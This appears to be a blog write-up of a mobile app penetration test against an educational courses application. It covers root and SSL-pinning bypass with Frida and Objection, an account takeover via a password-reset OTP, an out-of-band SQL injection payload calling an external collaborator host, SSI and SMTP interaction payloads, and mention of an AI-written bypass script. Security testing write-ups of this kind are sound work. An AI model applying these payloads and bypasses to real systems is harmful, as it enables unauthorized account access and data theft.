mobile
Introduction
During my recent penetration testing project for a company_ In the educational courses application.
Tools and Methodology
Outline the tools used for dynamic analysis and the methodology followed during the testing process.
Mobile Security Framework (MobSF) FRIDA Burp Suite Objection
nuclei sqlmap apktool jd-gui
Summary of Findings
I have found 2 High, 2 Medium, vulnerabilities were identified.
1- SSL Pinning Bypass
2- Account takeover
3- SQL Injection (SQLi)
4- Disclosure of sensitive data in URL parameters
5- External service interaction ( DNS & STMP )
Start using apktool and nuclei
The challenge here is to bypass all Detections to allow access API
DeveloperMode, Rootbeer & JailMonkey Root Detections.
If you try to bypass dev mode, you will see root detection, etc so I have asked chat GPT to make all of them in one script except ssl pinning by objection.
so now we have to bypass SSL pinning, if we run the Frida script with objection it will be terminated so
we open the first Terminal to run the Frida script and then run the objection both of them . By this line
``` objection --gadget $(frida-ps -Uai | grep com.company | awk '{print $1}') explore
Now we have access to Api Request
frist thnig try to test Reset Password endponit , open my check list note .
## 1- Account Takeover
---
Discovered Account Takeover password reset **check_mail_for_reset.php** Endpoint
[](https://www.blogger.com/#)
This vulnerability attacker can gain unauthorized access to the user’s account , using
Reset Password OTP by Intercept request .
so cloes my checklist note
[](https://www.blogger.com/#)
## 2- SQL Injection
---
Issue detail
The code JSON parameter appears to be vulnerable to SQL injection attacks. The payload (select
\356idrfjq2uj8x104al8bdh0irorcn0e22upmdb.oastify.com\nqk')) was submitted in the c
parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC fil
references a URL on an external domain. The application interacted with that domain, indicatin
injected SQL query was executed.
The database appears to be MySQL.
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL
unsafe manner. An attacker can supply crafted input to break out of the data context in which
appears and interfere with the structure of the surrounding query.
A wide range of damaging attacks can often be delivered via SQL injection, including reading or
critical application data, interfering with application logic, escalating privileges within the database
control of the database server.
all of this query vuln to SQL attack
```{
"email"
"student_id"
"category_id"
"student_name"
"student_avater_url"
"student_nickname"
"course_id"
"unit_id"
}
[](https://www.blogger.com/#)
and used too frida script by @SecFathy [https://codeshare.frida.re/@SecFathy/sqlite-data-monitor/](https://www.blogger.com/#)
[](https://www.blogger.com/#)
## Disclosure of sensitive data in URL
[](https://www.blogger.com/#)
[](https://www.blogger.com/#)
External service interaction ( DNS & STMP )
---
``Issue detail
DNS
It is possible to induce the application to perform server-side DNS lookups of
arbitrary domain names.
The server-side include statement "-->'-->`--> was submitted in the code JSON
parameter. This payload is designed to trigger a CNAME DNS lookup if the
application is vulnerable to server-side include.
The application performed a DNS lookup of the specified domain of an unexpected
type. This indicates that the server has a component that is parsing out hostnames
and making the interaction.
``Issue detail
SMTP
It is possible to induce the application to send emails via SMTP to arbitrary
addresses.
The email address 5bhkjtllw40lez72acrahfn2otutikc843svfl3a@oastify.com was
submitted in the email JSON parameter.
The application sent an email via SMTP to the specified address.
[](https://www.blogger.com/#)
[](https://www.blogger.com/#)
An attacker can send phishing links :D
also found Stored & Reflected Cross-Site Scripting (XSS) with no impact to exploit with ``web view``